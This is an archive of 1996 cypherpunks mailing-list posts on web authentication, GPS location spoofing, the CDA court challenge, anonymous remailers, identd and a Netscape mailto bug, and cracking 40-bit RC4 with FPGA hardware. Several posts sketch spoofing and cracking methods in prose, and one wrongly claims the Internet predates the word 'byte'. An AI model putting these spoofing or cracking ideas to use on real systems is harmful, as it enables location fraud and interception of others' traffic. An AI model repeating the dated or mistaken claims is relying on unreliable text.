>AFAIK, none.  I don't see how this would be helpful anyway.  If you 
>MD5 the password, I won't be able to snoop the password off the wire,
>but I can simply snoop the MD5 hash off the wire instead and since 
>that's what your authentication check must now be against, what does
>this buy you?

  It could be implemented thus:

  Server and client have a shared secret. The server sends the time, or
some random # to the client which MD5's this number and the secret, and
sends the result back to the server which then checks is.

  Similar to the APOP command for POP3 that I've never seen implemented.

    Brian


------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> -------
  Embedded Systems Programmer, EET Student, Interactive Fiction author (RSN!)
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@aa.net (Brian C. Lane)
Date: Fri, 12 Apr 1996 06:36:17 +0800
To: cypherpunks@toad.com
Subject: Re: WWW User authentication
In-Reply-To: <199604092101.QAA23912@cdale1.midwest.net>
Message-ID: <316c8d64.18461422@mail.aa.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Apr 1996 16:12:17 -0600, you wrote:

>>   I just finished writing a cgi script to allow users to change their login
>> passwords via a webpage. I currently have the webpage being authenticated
>> with the basic option (uuencoded plaintext). MD5 would be nicer, but how
>> many browsers actually support it?
>
>A straight MD5 probably isn't supported by any of them, but then again
>MD5 is not necessarily going to help too much.  The sort of people
>that need a web page to change their password aren't likely to
>use overly complex passwords (mixed-case, scrambled-in numbers,
>et al.)  So if a snoop can get the MD5, her chances of getting a password
>aren't all that bad.

  Hey! I'm not a total dunce! <G> The cgi I wrote (ok, ok, hacked) includes
cracklib support. It won't let people enter simple passwords.

>Your best bet is to try to implement it via SSL, but as I understand
>it that limits you on your server options quite a bit.  Netscape and
>Apache have it, as I understand; I think that's about it actually.
>But that's far from my areas of expertise.

  Yep, that's about it. And they want you to pay for using it in a
commercial venture (which my system will be eventually), and I can't
justify (or afford) the expense.

    Brian

------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> -------
  Embedded Systems Programmer, EET Student, Interactive Fiction author (RSN!)
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Fri, 12 Apr 1996 13:57:36 +0800
To: jamesd@echeque.com
Subject: Re: On computer face recognition:
In-Reply-To: <199604110601.XAA05984@dns2.noc.best.net>
Message-ID: <Pine.SV4.3.91.960411144737.17506D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


How do _people_ recognize faces?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 14 Apr 1996 01:35:24 +0800
To: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Subject: Re: No matter where you go, there they are.
In-Reply-To: <9604112026.AA8065@>
Message-ID: <199604111901.PAA21576@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com writes:
> Suppose I want to pretend that I am 1000 feet closer to satellite 4 than 
> I really am.  Simple, I take the signals from all the other satellites
> and delay them by 1 microsecond.  That looks like a 1 microsecond
> local timebase error together with a 1 microsecond delay reduction
> to satellite 4.

Aren't things even worse? Since the satelite signals are not
authenticated with anything like public key methods, couldn't I just
synthesize a signal appropriate to any spot on the planet, knowing the
positions of the satelites relative to that spot?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 13 Apr 1996 20:14:39 +0800
To: cypherpunks@toad.com
Subject: CDA Court Challenge: Update #6
Message-ID: <IlPJRGy00YUv4TOFNd@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain





-----------------------------------------------------------------------------
                        The CDA Challenge, Update #6
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

In this update: BYU/CMU's Dan Olsen's net-censorship boondoggle
                ACLU's 4/9 motion to suppress obscene images -- DENIED
                The new "I am a child" Internet protocol
                Who cares about kids: Who are the adults?
                Olsen as an expert witness -- on what?

April 11, 1996


PITTSBURGH, PA -- The U.S. Department of Justice wants to split the
worldwide Internet into "adult" and "minor" sections.

That's their plan, assuming they can find someone to testify that this
audacious boondoggle is even remotely feasible under current
technology. If the DoJ gets this testimony in the record, then their
attorneys will argue that the Communications Decency Act is
constitutional and should be upheld.

Well, they found their man. The Justice Department stoolie who's
testifying tomorrow is none other than Dan R. Olsen, Jr., the incoming
director of the Human Computer Interaction Institute at Carnegie
Mellon University, now the head of the computer science department at
Brigham Young University.

Olsen concocted this scheme that he calls L18, for "Less than 18."
Under it, every net-user must label every USENET post, email message,
FTP site file, web page, chat room, IRC channel -- any collection of
public bits spewed on the Net -- if the content is "inappropriate for
minors."

If you think you're clever 'cuz you labeled some "indecent" materials
as suitable for kids, guess again, pal. Try that trick and the Feds'll
throw your ass in jail for two years and send you a bill for $250,000.
(Owners of anonymous remailers might be for in some surprise visits
from the Feds if their systems are used to post "indecent" stuff
that's labeled L18.)

The censorhappy geeks at Brigham Young University put together a demo
to prove that this scheme works. First Olsen stuck L18 tags on half
his web pages. Then they set up a "Netscape proxy server" so it denied
access to pages with L18 tags unless the user was verified as an
adult. The experiment was a success -- and a hit with the DoJ!

By now cybersavvy readers are wondering: "But how will a server know
how old a user is?"

The DoJ has a couple ideas that they're going to throw at the
three-judge panel in Philadelphia tomorrow. The government's idea
seems to be that if the judges accept even one of them, they'll uphold
the CDA. The DoJ's proposals are:

  1. Servers with "indecent material" will register users as adults or
     minors.
  2. Every ISP will tag accounts as adults or minors.
  3. A custom router will only allow users to access "indecent" sites
     if an adult types in the password first.

Olsen's Grand Design for the Net incorporates Proposal #1. He's
pushing the idea that web servers or proxy servers with "indecent"
material will give out "adult verification passwords" before you can
access their web page. This means:

  * A lengthy pre-registration process before you can access the site.
  * The server has to keep a database with the identities of all the
    adult users, complete with the credit card numbers that presumably
    will be used for verification.
  * If you want to access hundreds of web sites with "indecent"
    material, you've got to get hundreds of different passwords.

If you run a web site with material that a Federal prosecutor anywhere
in the U.S. may find "indecent" or "patently offensive," under Olsen's
plan you have to verify that your users are adults.

Somehow, I don't expect overseas sites will go for this. What, doesn't
the DoJ realize that we're not just talking about the U.S. here?


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
          ACLU'S MOTION TO SUPRESS OBSCENE IMAGES -- DENIED!
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

It's not about cybercensorship. It's about cybersex.

At least that's what the DoJ wants everyone to believe. Justice
Department attorneys have been flooding the court with printouts of
hundreds of pages of dirty pictures, a lot of them pretty damn
raunchy. Some of them might even be "obscene" -- that is, they fall
into a legal class of images that flunk a three-part test that
includes only images without "serious literary, artistic, social,
political, or scientific value."

Pretty hardcore stuff. GIFs like coeds fraternizing with german
shepherds -- with the help of 25' of rubber tubing and a Tibetan yak.

On April 9, the ACLU/EFF plaintiffs filed a motion to close the
floodgates on the DoJ's deluge of porn, asking that the government be
barred from introducing exhibits "unless they believe in good faith
the material could not be prosecuted under existing obscenity or child
pornography laws."

The idea behind this motion was to educate the court and remind them
that the CDA outlaws "indecency," not "obscenity." EFF attorney Mike
Godwin explains the difference in his forthcoming book _Cyber Rights_:

  The term "indecency," although never defined by Congress or the
  courts, is a far broader concept than "obscenity" (examples of
  "indecency" include George Carlin's famous "Seven Dirty Words"
  monologues, at least some portions of Howard Stern's radio
  broadcasts, and, according to one court, the text of Allen
  Ginsberg's "Howl").

Not one of our plaintiffs has "obscene" or even titillating pictures
on our web sites, but all of us are subject to a $250,000 fine and two
years in prison if a minor stumbles across our URL.

Yesterday the court denied our motion, saying that it understood that
we weren't challenging obscenity laws and that, unlike the situation
that might occur if there were a jury, the judges would not be
prejudiced by any pictures introduced.

The court ruled *they* were capable of understanding the difference,
so there was no need to separate the materials. They did admit that we
had raised an important issue, and the court understood the reason for
the motion.

I guess we have to trust them.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                 THE NEW "I AM A CHILD" INTERNET PROTOCOL
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

There's a second way to answer the question of: "How do you know who
the children are?"

Another option the DoJ appears to be pushing -- we'll know details
tomorrow -- is this idea of reprogramming every computer on the
worldwide Internet to run software that tags users as adults or
minors, so a server will know whether it can send out "indecent"
material.

This shifts the burden of establishing age-identity from the content
provider to the business or school giving out the Internet account.

It also would allow any unscrupulous net.lurker to troll for "I am a
child" tags and follow them back to the originating site -- not
exactly the best way to protect the children!

I should have realized this DoJ strategy earlier. Last week when I was
arguing with Bruce Taylor, an architect of the CDA, we went 'round and
'round on the issue of children on the Net. He maintained that every
Internet user has to have an account somewhere, so the provider of
that account can tag the user as a minor or adult.

I asked Taylor how his proposal was possible with the TCP/IP protocol
-- the nerve system the carries all the data flowing through the Net.
He replied that technical problems can be solved by technical people,
and wasn't there a new protocol being developed, anyway?  Basically,
his position was: "Your side comes across to the court as saying that
it can be done but we won't do it. You're a bunch of geeks who want to
protect their porn and the court isn't going to buy it."

The "new protocol" being developed is IP Version 6, which the DoJ
zoomed in on in cross-examination of one of our witnesses, Scott
Bradner from the Internet Engineering Task Force:

   13    Q   Would it be fair to say, to summarize what you've just
   14        said, that the IP Next Generation group is working on a new
   15        generation of the IP Protocol itself?
   16    A   That is correct.
   17    Q   Does it have -- does the IP Next Generation group have
   18        recommendations regarding a specific architecture of the
   19        packet traffic on the Internet, including the format of the
   20        packet?

The DoJ is going to argue that IPv6 can include such an adult/minor
tag in each datagram. Chris Hansen, the head of the ACLU's legal team,
says:

  Olsen is going to push this tagging idea that the government has,
  that you can imbed in your tag -- in your address -- an adult or
  minor tag. They're going to suggest that the market will come into
  existence that will make that tagging relevant.

It's more like the *judicial penalties* will evolve to make the
tagging not just relevant, but mandatory! On the cypherpunks list,
Bill Frantz, a computer consultant, outlines one problem:

  One of the migration paths suggested for IPV4 to IPV6 migration is
  to tunnel IPV4 packets within IPV6 packets. IPV4 packets do not
  provide for an adult/minor tag, so until the transition to IPV6 is
  fairly well along, this approach will be ineffective.

  If the people who are worried about minor's accessing smut want
  something this century, they should go with PICS.

A member of the IETF replies:

  Neither, for that matter, do IPv6 packets -- there is no provision
  for them. Furthermore, were anyone to create an end to end header of
  that sort, it would be eight bytes of wasted space in every packet
  in the net, especially since the implementation of such a tag is a
  technical impossibility as there is no way to force the originating
  system to tell the truth.

The "high-touch" argument against this is important as the high-tech
one. I just received the following mail from someone who would be
unable to continue his work if the DoJ's IPv6 scheme is implemented:

  We provide free anonymous access to the net to sexual abuse survivors.
  We don't even know who they are, nor do we care - a lot of them are
  hiding out from their perps, and to try and identify them would be a
  tremendous breach of trust, as they are depending on us for their
  anonymity, much as a reporter would protect their anonymous source.

  I also have been told by these folks themselves that some of them are
  under the age of 18 - hell, I've had a few that tell me that they are
  13 or 14 years old, and that they are still at home, still being raped
  by their perps. We provide an outlet for their frustrations, emptional
  support, a community for them, people to talk to, and support for them
  if they choose to report their abuse.  None of this would be possible 
  if Taylor and friends had their way.

  Sure, we could trace each and every one of them back to their
  providers, and find out who they are, but I'm not going to do it, and
  I'm perfectly willing to go to jail to protect their identities. My
  integrity is worth a whole hell of a lot more than any government law.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                WHO CARES ABOUT KIDS: WHO ARE THE ADULTS?
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

The third way to answer the now-tiresome who-are-the-kiddies question
is to turn it on its head and ask: "Who are the adults?"

Hardware to answer that question already exists. The March 25 issue of
Interactive Week reports that Livingston Enterprises, Inc. has
colluded with Senator Exon's staff to design an "Exon box" -- a router
that lets ISPs cut off unrated or "indecent" or unrated sites. To get
around the block, an "adult" enters a secret password that tells the
router to open a session and let the packets flow.

Exon's staff is heralding this as an example of how easy it is to
comply with the CDA. The only problem is that, like many such
hamfisted censorship "solutions," it sucks, and it ain't going to
work. One of the original architects of the Internet, David P. Reed,
wrote:

  I do work to protect my children from inappropriate material, but
  pressure from Senators to mandate technically flawed solutions, and
  opportunistic, poorly thought-through technologies from companies
  like Livingston are not helpful.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                OLSEN AS AN EXPERT WITNESS -- ON WHAT?
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

As I was writing this, I started wondering why Olsen got picked as the
DoJ's expert witness for tomorrow's hearing, especially when his
research is *not* in distributed computing environments and protocol
design. It's in human computer interaction and user interfaces.

One of Olsen's former students at Brigham Young University contacted
me last week, saying he had initially hoped that Olsen was "lending a
neutral opinion" on technical issues "but that hope proved false."

I asked if his former faculty member has "done any work relating to
distributed computing environments like the Internet?" His reply: "The
closest thing I'm aware of is a paper on interactive bookmarks."

Network engineering that ain't.

On April 7th I sent Olsen email, asking him: "What kind of research
have you done related to distributed computing environments like the
Internet?"

As of April 11, still no response -- even though he had replied to my
earlier messages almost immediately. (I wouldn't put it past the DoJ's
tame attack ferret, Jason Baron, to try and muzzle Olsen as well.)

Vanderbilt Professor Donna Hoffman writes about Olsen:

  A colleague at CMU told me that Dan Olsen is largely an administrator
  at BYU and will assume administrative duties at CMU as the temporary
  head of the HCII... I've seen his vita and talked to some colleagues
  in CS and related fields about his work and it doesn't seem that he
  has done much, if any, research related to the distributed computing
  environments like the Internet.

  His vita is difficult to parse because he has numerous items I can't
  identify - for example, are they book chapters, working papers,
  proceedings?  Where were they published?  And so on.

  He is the Editor of a new journal published by CACM which started a
  few months ago, related to human-computer interaction.  His main
  research interest seems to be in user interface issues, but he
  hasn't published much in scholarly journals so I would conclude that
  his work has had little impact on the field.

(I should point out here that a member of the HCII at CMU sent me mail
saying that conference proceedings are the main form of publication in
the field.)

Still, I wonder why the DoJ couldn't get a real net-expert to defend
the CDA and the network protocol schemes they're proposing?

Grey Flannel Suit (aka Air Force Special Agent Howard A.  Schmidt) is
going to take the stand tomorrow and do a live demonstration of how he
can find cybersleze on the Net. I can hardly wait!

Grey Flannel has been involved in a half-dozen porn prosecutions in
the past: two dealing with civilian porn sites and and four dealing
with military ones. From the deposition he gave in Washington, DC
earlier this week, the extent of his testimony seems to be: "I went
onto the Net and found dirty pictures."

The following clue as to Grey Flannel's history of porn-prosecutions
flowed into my mailbox the other day:

  It would be interesting to find out if Schmidt was involved in _US v.
  Maxwell_, 42 M.J. 568 (USAF Ct Crim App 1995), a military justice
  case concerning a USAF colonel who used AOL to communicate "indecent
  language" to another servicemember and to traffic in pornographic
  matter. USAFOSI was clearly involved in the investigation, but no
  agents are named in the opinion.

Flannel will be followed by our last witness, MIT's Albert Vezza, and
then Dan Olsen.

Stay tuned for more reports.


-----------------------------------------------------------------------------

We're back in court on 4/12, possibly 4/15 as a last day of witness
testimony, 4/26 for rebuttal if necessary, and 6/3 for closing
arguments.

Mentioned in this CDA update:

  Michael Froomkin: "The Internet as a Source of Regulatory Arbitrage"
    <http://www.law.miami.edu/~froomkin/arbitr.htm>
  Wired: "How Anarchy Works -- Inside the Internet Engineering Task Force"
    <http://www.hotwired.com/wired/3.10/departments/electrosphere/ietf.html>
  Net-Guru David Reed's article: "CDA may pervert Internet architecture"
    <http://fight-censorship.dementia.org/fight-censorship/dl?num=2093>
  Michael Froomkin's LONG article on anonymous remailers:
   <http://www.law.miami.edu/~froomkin/ocean1-7.htm>
  Dan Olsen at BYU        <http://www.cs.byu.edu/info/drolsen.html>
  BYU's censorship policy <http://advance.byu.edu/pc/releases/guidelines.html>
  Internet Eng Task Force <http://www.ietf.org/>
  Rimm ethics critique    <http://www.cs.cmu.edu/~declan/rimm/>
  Int'l Net-Censorship    <http://www.cs.cmu.edu/~declan/zambia/>
  CMU net-censorship      <http://www.cs.cmu.edu/~kcf/censor>
  University censorship   <http://joc.mit.edu/>
  Grey Flannel Suit       <howardas@aol.com>

This report and previous CDA Updates are available at:
  <http://fight-censorship.dementia.org/top/>
  <http://www.eff.org/pub/Legal/Cases/EFF_ACLU_v_DoJ/>
  <http://www.epic.org/free_speech/censorship/lawsuit/>

To subscribe to the fight-censorship mailing list for future CDA
updates and related net.censorship discussions, send "subscribe" in
the body of a message addressed to:
  fight-censorship-request@andrew.cmu.edu
 
Other relevant web sites:
  <http://www.eff.org/>
  <http://www.aclu.org/>
  <http://www.cdt.org/>

-----------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Powers Glenn" <Q101NOW@st.vse.cz>
Date: Fri, 12 Apr 1996 04:14:17 +0800
To: cypherpunks@toad.com
Subject: Re: Message not deliverable
Message-ID: <799D7708F1@st.vse.cz>
MIME-Version: 1.0
Content-Type: text/plain


I've gotten these, too.
glenn

- From:           JonWienke@aol.com
- Date sent:      Wed, 10 Apr 1996 16:49:33 -0400
- To:             cypherpunks@toad.com
- Subject:        Re: Message not deliverable

- >Subj:  Message not deliverable
- >Date:  96-04-10 11:51:09 EDT
- >From:  Administrator_at_DCACINTS@dca.com (Administrator)
- >To:    JonWienke@aol.com
- 
- [body text deleted]
- 
- Has anyone else been getting these when they post to cpunks?  I get one every
- time I post.  I emailed the administrator at dca.com, a few weeks ago, but
- nothing has changed.  Anyone got suggestions?
- 
- Jonathan Wienke
- 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Apr 1996 00:40:04 +0800
To: Blake Coverett <blake@bcdev.com>
Subject: RE: questions about bits and bytes
Message-ID: <m0u7Unh-0008yfC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 AM 4/11/96 -0400, Blake Coverett wrote:
>> At 06:29 PM 4/10/96 -0700, Simon Spero wrote:
>> >No, bytes are no always 8 bits - some machines use(d) 9-bit bytes. 
>> 
>> I notice you gave no examples.  Why is that?
>> 
>> Jim Bell
>> jimbell@pacifier.com
>
>In a past life I worked on a Honeywell DPS8 box that had 
>36 bit words and 9 bit bytes.

I'm seeing a few notes of this sort which make such claims, but there is not 
enough information included to establish that anybody _originally_ called 
those 9-bit data items "bytes" or not.  It appears to me that after the 
fact, 20+ years later, there is a tendency to call ANYTHING other than a 
single bit a byte, at least during that time frame.  What I'm looking for, 
however, is an indication that this was actually the term used, THEN, for 
that data structure.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 13 Apr 1996 03:58:03 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <199604112224.PAA11290@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


For information on the "Internet Philosophy" there is a IETF draft that
might be of interest at:

ftp://ds.internic.net/internet-drafts/draft-iab-principles-02.txt


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 12 Apr 1996 11:58:03 +0800
To: John Deters <cypherpunks@toad.com
Subject: Re: Digital Cash Escrow
Message-ID: <m0u7VIU-0008zAC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:17 AM 4/11/96 -0500, John Deters wrote:
  Go dig up the manuals for a
>UNIVAC 1100, Jim.  Why do you think the RFCs for IP specifically refer to
>"octets" as opposed to "bytes"?  Because (they explain) "octet" is
>unambiguous, which then infers a certain ambiguity to "byte", now, doesn't it?

Wasn't the original development of the Internet done in the middle 1960's?  
And thus, does its development pre-date the coinage of the term, "byte"?  

If that's true, doesn't this answer your question?  The terminology used for 
the definition of a standard often tends to be frozen in time.  Lacking the 
term "byte" they used "octet."  The subsequent invention of the term "byte" 
would not have displaced the original term, at least in Internet standards.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Tardieu <sam@inf.enst.fr>
Date: Fri, 12 Apr 1996 04:08:00 +0800
To: me@muddcs.cs.hmc.edu (Michael Elkins)
Subject: Re: Scientologists may subpoena anonymous remailer records
In-Reply-To: <199604110647.XAA05823@muddcs.cs.hmc.edu>
Message-ID: <qw6wx3mhnja.fsf@gargantua.enst.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Michael" == Michael Elkins <me@muddcs.cs.hmc.edu> writes:

Michael> I've heard several people make this statement...  Can anyone
Michael> confirm that it is really possible to log the uid (username)
Michael> of the person making the http request?  I know they can get
Michael> your ip address, but I'm skeptical of getting the username.

There is no general rule, it depends on your system, your system
administrator, your browser, .... If you use Unix, there is no way to
know who is at the other end of a socket without using either:
 
  1) finger- or rusers-like information, which is only a guess than
     may easily be defeated;

  2) a "identity daemon", which is run on port 113 and may be queried
     by a host to which a connection is being made.

This kind of identity daemon sometimes has an option which makes it
look for a file in the user's home directory before answering ; if
this file is present, then the user-id won't be disclosed. It is also
very time-consuming for a WWW server to make such a TCP connection
each time a request is made, it slows down the request a lot.

Anyway, the use of a proxy may help you in that the user-id will
probably "nobody". You stay anonymous, unless your proxy's manager
keeps the logs.

The other way to get your identity is... getting cooperation from
yourself ! There was a bug in Netscape 2.0 which made it possible to
make you send a mail without even realizing it when browsing some
pages (using a form with a mailto: action and a piece of JavaScript to
submit the form). Other browsers may well send your user-id and/or you
real name across the network in a browser-defined header. This must be
checked on a browser per browser basis, since each browser is free to
add any header it wants.

  Sam
- -- 
"La cervelle des petits enfants, ca doit avoir comme un petit gout de noisette"
                                                       Charles Baudelaire

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMW0Pk4FdzKExeYBpAQGyWAP+LwubZ9+aqzaP7Lq44Lhlztshp0YPslVF
yioq8BGlxotMlLEQHdOyVHfjUGnV7U9eUdeT5jWplKmhpEVgYiYlOtHKX8JOLDno
X7dhCQG14Q8bQctlS7UQ5EV10sM5CaNN4G+Cx05iSZ8VY+aFScdRlS77EMovMKD4
Y1YC8P41RdY=
=l4BE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@digit.ee>
Date: Fri, 12 Apr 1996 03:08:06 +0800
To: cypherpunks@toad.com
Subject: Re: Bank information protected by 40-bit encryption....
In-Reply-To: <316C9890.41C6@netscape.com>
Message-ID: <Pine.GSO.3.92.960411160334.16119J-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Apr 1996, Tom Weinstein wrote:

> Sorry, I think I was hallucinating or something.  You're right, they
> don't require 128-bit encryption and they only let you query your
> balance.

Are there any banks besides SFNB then that use weak 40-bit encryption for
anything more than balance queries or transaction history, and allow to
make real transactions on-line?

I know Merita in Finland allows bank transactions using 40-bit RC4, but
they also use one-time passwords (every user gets a printed list with 40
or so password pairs, each of which you can use just once).

Juri Kaljundi
jk@digit.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rogue Agent <agent@l0pht.com>
Date: Fri, 12 Apr 1996 09:29:25 +0800
To: cypherpunks@toad.com (cypherpunks)
Subject: Re: Scientologists may subpoena anonymous remailer records
Message-ID: <199604112008.QAA25509@l0pht.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May (tcmay@got.net) wrote:
|At 8:12 PM 4/10/96, Steve Reid wrote:
[...]
|>I don't really know much about remailers, but I don't think there's much
|>to know... If I'm mistaken about any of the above, I'm sure someone will
|>correct me.
|
|Glad to oblige. I note also that Jim Byrd and Jim Warren are unclear on
|some details. (To Jim Byrd, that "alumni account at Cal Tech" that you
|mentioned was one of the Cypherpunks remailers at Caltech that our own
|pioneering Hal Finney runs.)

Incorrect.  The account was tc@alumni.caltech.edu, which is not the same
as Hal's remailer at hal@alumni.caltech.edu.  Just an odd coincidence they
were on the same machine. 

There's a whole saga about how CoS tracked the guy down, it's quite a
story.  Rather than go into it here and leave things out or confuse them
further, check out
http://www.cybercom.net/~rnewman/scientology/anon/penet.html for a clear,
concise explanation of the whole bizarre affair.  Check out Ron's "CoS vs
the Net" page while you're at it, at
http://www.cybercom.net/~rnewman/scientology/home.html. 

|Cypherpunks remailers account for something like 29 out of 30 of all the
|world's remailers, by site count, though not volume. Sophisticated users
|know that the Cypherpunks model is the only robust one; Julf's approach 
|has an ecological niche, but is highly vulnerable to the very subpoena 
|approach used recently (not "several years ago" as Jim Warren says).

It's also suceptible to hacker attack, as happened a few years ago. 
"Information wants to be free" is not a political statement, it's a fact
of nature.  One property of information is that it tends to spread.  If
you don't want the information to spread, don't store it.

        RA

agent@l0pht.com (Rogue Agent/SoD!/TOS/attb) - pgp key on request
----------------------------------------------------------------
The NSA is now funding research not only in cryptography, but in all areas
of advanced mathematics. If you'd like a circular describing these new
research opportunities, just pick up your phone, call your mother, and
ask for one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 13 Apr 1996 22:57:27 +0800
To: cypherpunks@toad.com
Subject: Email privacy policies at universities
Message-ID: <Pine.ULT.3.92.960411160134.23921A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


We don't really have one, because we respect privacy in general.  Kind of
a "congress shall make no law" approach. Skidmore seems to have a pretty
reasonable policy at http://www.skidmore.edu/help/rules/mail-privacy.html

If you know of others, please pass along for the discussion on the resnet
list, http://www.acns.nwu.edu/resnet/resnet-forum/resnet-forum.html The
subject line there reads "off topic" for that list, but I don't think it
is.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@digit.ee>
Date: Fri, 12 Apr 1996 03:11:36 +0800
To: cypherpunks@toad.com
Subject: Re: RC4 on FPGAs (Was: Bank transactions on Internet)
In-Reply-To: <4kh71n$cl3@abraham.cs.berkeley.edu>
Message-ID: <Pine.GSO.3.92.960411160924.16119K-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain


On 10 Apr 1996, Ian Goldberg wrote:

> Coincidentaly enough, this is part of my project for my Hardware class.
> I'll let you know when I have it working.  I'm using Altera FLEX 81188s,
> though the 10K models (with built-in RAM) would be _way_ faster...

Once someone gets this kind of cracking device ready, I think it would be
nice to make the information freely available, or start selling these for
nominal price.

This would also make an interesting device connected to Internet. In case
of fast device people could use it either for free or pay using ecash for
using it, and crack their SSL sessions. May be Netscape or Microsoft or
someone else (may be even Community Connexion :) lobbying the government
for allowing export of strong encryption could sponsor it. It should not
be so expencive. Much more useful than amazing fish-cam or coke machine on
Internet.

Juri Kaljundi
jk@digit.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sat, 13 Apr 1996 02:42:24 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Know Your Net.Enemies Project
Message-ID: <199604112020.QAA06780@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Apr 10, 1996 23:47:54, '"Declan B. McCullagh" <declan+@CMU.EDU>' wrote: 
 
 
>Would anyone be interested in collaborating on a "Know Your Net Enemies" 
>project? 
 
Feel free to use my writings on the CyberAngels. 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Sun, 14 Apr 1996 00:33:29 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <9604112350.AA9349@>
MIME-Version: 1.0
Content-Type: text/plain


>From: perry @ piermont.com ("Perry E. Metzger")
>Aren't things even worse? Since the satelite signals are not
>authenticated with anything like public key methods, couldn't I just
>synthesize a signal appropriate to any spot on the planet, knowing the
>positions of the satelites relative to that spot?

In the case of the C/A (civilian) code, absolutely.  In the case of the
P code (military) only if you have the key, but in that case, yes.

As Jim Bell pointed out, there are boxes you can buy for
suitable amounts of money that are "GPS simulators" -- they construct
out of whole cloth the signals you would receive if you were at
location X with satellites {Y1, Y2, ...} overhead.

However, if all you set out to do is fool a location authenticator,
deriving shifted location data from the actual satellites is far
easier and bound to be much cheaper.  There is one limitation
this has that the simulator approach doesn't -- delaying real signals
requires having access to the same satellites (or a large enough
subset, i.e., 3-4 of them) that the checking station has overhead.

 paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 14 Apr 1996 00:05:30 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Money supply is fake anyway
In-Reply-To: <199604112040.NAA18876@netcom7.netcom.com>
Message-ID: <199604112050.QAA21809@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



